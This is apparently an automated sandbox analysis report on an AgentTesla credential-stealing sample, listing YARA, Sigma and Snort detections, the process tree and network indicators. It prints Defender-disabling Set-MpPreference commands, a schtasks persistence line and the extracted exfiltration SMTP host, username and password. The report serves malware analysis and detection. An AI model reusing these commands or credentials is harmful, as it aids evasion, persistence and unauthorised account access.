Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Analysis ID:	756190
MD5:	65cf34490748f7924db84dc043f5d81e
SHA1:	1ea50942d4acf0561bd6bcb3fe0195069eb5c259
SHA256:	96642679196d3f732718eebf2e7970d7eca03ddc4645b3f0292db847ed82b24e
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Yara detected AntiVM3

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe (PID: 5996 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe MD5: 65CF34490748F7924DB84DC043F5D81E)

schtasks.exe (PID: 4572 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe (PID: 532 cmdline: {path} MD5: 65CF34490748F7924DB84DC043F5D81E)

IwUNvHNy.exe (PID: 4664 cmdline: C:\Users\user\AppData\Roaming\IwUNvHNy.exe MD5: 65CF34490748F7924DB84DC043F5D81E)

schtasks.exe (PID: 3236 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

IwUNvHNy.exe (PID: 5060 cmdline: {path} MD5: 65CF34490748F7924DB84DC043F5D81E)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x15a83a:$a13: get_DnsResolver 0x190a5a:$a13: get_DnsResolver 0x158f64:$a20: get_LastAccessed 0x18f184:$a20: get_LastAccessed 0x15b247:$a27: set_InternalServerPort 0x191467:$a27: set_InternalServerPort 0x15b590:$a30: set_GuidMasterKey 0x1917b0:$a30: set_GuidMasterKey 0x159076:$a33: get_Clipboard 0x18f296:$a33: get_Clipboard 0x159084:$a34: get_Keyboard 0x18f2a4:$a34: get_Keyboard 0x15a425:$a35: get_ShiftKeyDown 0x190645:$a35: get_ShiftKeyDown 0x15a436:$a36: get_AltKeyDown 0x190656:$a36: get_AltKeyDown 0x159091:$a37: get_Password 0x18f2b1:$a37: get_Password 0x159b80:$a38: get_PasswordHash 0x18fda0:$a38: get_PasswordHash 0x15ac7b:$a39: get_DefaultCredentials
0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31cca:$a13: get_DnsResolver 0x303f4:$a20: get_LastAccessed 0x326d7:$a27: set_InternalServerPort 0x32a20:$a30: set_GuidMasterKey 0x30506:$a33: get_Clipboard 0x30514:$a34: get_Keyboard 0x318b5:$a35: get_ShiftKeyDown 0x318c6:$a36: get_AltKeyDown 0x30521:$a37: get_Password 0x31010:$a38: get_PasswordHash 0x3210b:$a39: get_DefaultCredentials
0000000A.00000002.525329197.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x103bec:$a13: get_DnsResolver 0x1029d8:$a20: get_LastAccessed 0x10437d:$a27: set_InternalServerPort 0x104565:$a30: set_GuidMasterKey 0x102ac5:$a33: get_Clipboard 0x102ad3:$a34: get_Keyboard 0x103925:$a35: get_ShiftKeyDown 0x103936:$a36: get_AltKeyDown 0x102ae0:$a37: get_Password 0x10328c:$a38: get_PasswordHash 0x103f08:$a39: get_DefaultCredentials
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x3a6ba:$a13: get_DnsResolver 0x39047:$a20: get_LastAccessed 0x3b076:$a27: set_InternalServerPort 0x3b2f1:$a30: set_GuidMasterKey 0x39142:$a33: get_Clipboard 0x39150:$a34: get_Keyboard 0x3a341:$a35: get_ShiftKeyDown 0x3a352:$a36: get_AltKeyDown 0x3915d:$a37: get_Password 0x39ba5:$a38: get_PasswordHash 0x3aacf:$a39: get_DefaultCredentials
Process Memory Space: IwUNvHNy.exe PID: 5060	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: IwUNvHNy.exe PID: 5060	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32bcc:$s10: logins 0x3264c:$s11: credential 0x2e906:$g1: get_Clipboard 0x2e914:$g2: get_Keyboard 0x2e921:$g3: get_Password 0x2fca5:$g4: get_CtrlKeyDown 0x2fcb5:$g5: get_ShiftKeyDown 0x2fcc6:$g6: get_AltKeyDown
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x300ca:$a13: get_DnsResolver 0x2e7f4:$a20: get_LastAccessed 0x30ad7:$a27: set_InternalServerPort 0x30e20:$a30: set_GuidMasterKey 0x2e906:$a33: get_Clipboard 0x2e914:$a34: get_Keyboard 0x2fcb5:$a35: get_ShiftKeyDown 0x2fcc6:$a36: get_AltKeyDown 0x2e921:$a37: get_Password 0x2f410:$a38: get_PasswordHash 0x3050b:$a39: get_DefaultCredentials
10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x349cc:$s10: logins 0x3444c:$s11: credential 0x30706:$g1: get_Clipboard 0x30714:$g2: get_Keyboard 0x30721:$g3: get_Password 0x31aa5:$g4: get_CtrlKeyDown 0x31ab5:$g5: get_ShiftKeyDown 0x31ac6:$g6: get_AltKeyDown
10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31eca:$a13: get_DnsResolver 0x305f4:$a20: get_LastAccessed 0x328d7:$a27: set_InternalServerPort 0x32c20:$a30: set_GuidMasterKey 0x30706:$a33: get_Clipboard 0x30714:$a34: get_Keyboard 0x31ab5:$a35: get_ShiftKeyDown 0x31ac6:$a36: get_AltKeyDown 0x30721:$a37: get_Password 0x31210:$a38: get_PasswordHash 0x3230b:$a39: get_DefaultCredentials
11.2.IwUNvHNy.exe.293a138.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x27d2c:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x27d70:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x27db8:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x28044:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x280a8:$s2: Set-MpPreference -DisableArchiveScanning $true 0x28100:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x28158:$s4: Set-MpPreference -DisableScriptScanning $true 0x281a4:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x281e4:$s6: Set-MpPreference -MAPSReporting 0 0x28230:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x28288:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x282d8:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x28328:$s10: Set-MpPreference -SevereThreatDefaultAction 6
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0xdf81c:$s10: logins 0x115a3c:$s10: logins 0xdf29c:$s11: credential 0x1154bc:$s11: credential 0xdb556:$g1: get_Clipboard 0x111776:$g1: get_Clipboard 0xdb564:$g2: get_Keyboard 0x111784:$g2: get_Keyboard 0xdb571:$g3: get_Password 0x111791:$g3: get_Password 0xdc8f5:$g4: get_CtrlKeyDown 0x112b15:$g4: get_CtrlKeyDown 0xdc905:$g5: get_ShiftKeyDown 0x112b25:$g5: get_ShiftKeyDown 0xdc916:$g6: get_AltKeyDown 0x112b36:$g6: get_AltKeyDown
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xdcd1a:$a13: get_DnsResolver 0x112f3a:$a13: get_DnsResolver 0xdb444:$a20: get_LastAccessed 0x111664:$a20: get_LastAccessed 0xdd727:$a27: set_InternalServerPort 0x113947:$a27: set_InternalServerPort 0xdda70:$a30: set_GuidMasterKey 0x113c90:$a30: set_GuidMasterKey 0xdb556:$a33: get_Clipboard 0x111776:$a33: get_Clipboard 0xdb564:$a34: get_Keyboard 0x111784:$a34: get_Keyboard 0xdc905:$a35: get_ShiftKeyDown 0x112b25:$a35: get_ShiftKeyDown 0xdc916:$a36: get_AltKeyDown 0x112b36:$a36: get_AltKeyDown 0xdb571:$a37: get_Password 0x111791:$a37: get_Password 0xdc060:$a38: get_PasswordHash 0x112280:$a38: get_PasswordHash 0xdd15b:$a39: get_DefaultCredentials
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x349cc:$s10: logins 0x6abec:$s10: logins 0x3444c:$s11: credential 0x6a66c:$s11: credential 0x30706:$g1: get_Clipboard 0x66926:$g1: get_Clipboard 0x30714:$g2: get_Keyboard 0x66934:$g2: get_Keyboard 0x30721:$g3: get_Password 0x66941:$g3: get_Password 0x31aa5:$g4: get_CtrlKeyDown 0x67cc5:$g4: get_CtrlKeyDown 0x31ab5:$g5: get_ShiftKeyDown 0x67cd5:$g5: get_ShiftKeyDown 0x31ac6:$g6: get_AltKeyDown 0x67ce6:$g6: get_AltKeyDown
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31eca:$a13: get_DnsResolver 0x680ea:$a13: get_DnsResolver 0x305f4:$a20: get_LastAccessed 0x66814:$a20: get_LastAccessed 0x328d7:$a27: set_InternalServerPort 0x68af7:$a27: set_InternalServerPort 0x32c20:$a30: set_GuidMasterKey 0x68e40:$a30: set_GuidMasterKey 0x30706:$a33: get_Clipboard 0x66926:$a33: get_Clipboard 0x30714:$a34: get_Keyboard 0x66934:$a34: get_Keyboard 0x31ab5:$a35: get_ShiftKeyDown 0x67cd5:$a35: get_ShiftKeyDown 0x31ac6:$a36: get_AltKeyDown 0x67ce6:$a36: get_AltKeyDown 0x30721:$a37: get_Password 0x66941:$a37: get_Password 0x31210:$a38: get_PasswordHash 0x67430:$a38: get_PasswordHash 0x3230b:$a39: get_DefaultCredentials
0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.31ea1d8.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x27d2c:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x27d70:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x27db8:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x28044:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x280a8:$s2: Set-MpPreference -DisableArchiveScanning $true 0x28100:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x28158:$s4: Set-MpPreference -DisableScriptScanning $true 0x281a4:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x281e4:$s6: Set-MpPreference -MAPSReporting 0 0x28230:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x28288:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x282d8:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x28328:$s10: Set-MpPreference -SevereThreatDefaultAction 6
Click to see the 13 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ParentProcessId: 5996, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp, ProcessId: 4572, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 111.118.212.38

Timestamp:	192.168.2.6111.118.212.38497235872030171 11/29/22-19:38:19.561263
SID:	2030171
Source Port:	49723
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 111.118.212.38

Timestamp:	192.168.2.6111.118.212.38497185872030171 11/29/22-19:37:32.174046
SID:	2030171
Source Port:	49718
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Joe Sandbox ML: detected

Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.strictfacilityservices.com", "Username": "accounts@strictfacilityservices.com", "Password": "SFS!@#321"}

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ImbSRib.pdb source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr
Source:	Binary string: ImbSRib.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49718 -> 111.118.212.38:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49723 -> 111.118.212.38:587

May check the online IP address of the machine

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	DNS query: name: api.ipify.org

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 3.232.242.170 3.232.242.170
Source: Joe Sandbox View	IP Address: 3.232.242.170 3.232.242.170

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.6:49718 -> 111.118.212.38:587

Source: global traffic

TCP traffic: 192.168.2.6:49718 -> 111.118.212.38:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://UrUbMY.com
Source: IwUNvHNy.exe, 0000000E.00000002.522029143.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000003.478235783.00000000014EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537441042.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.strictfacilityservices.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://strictfacilityservices.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
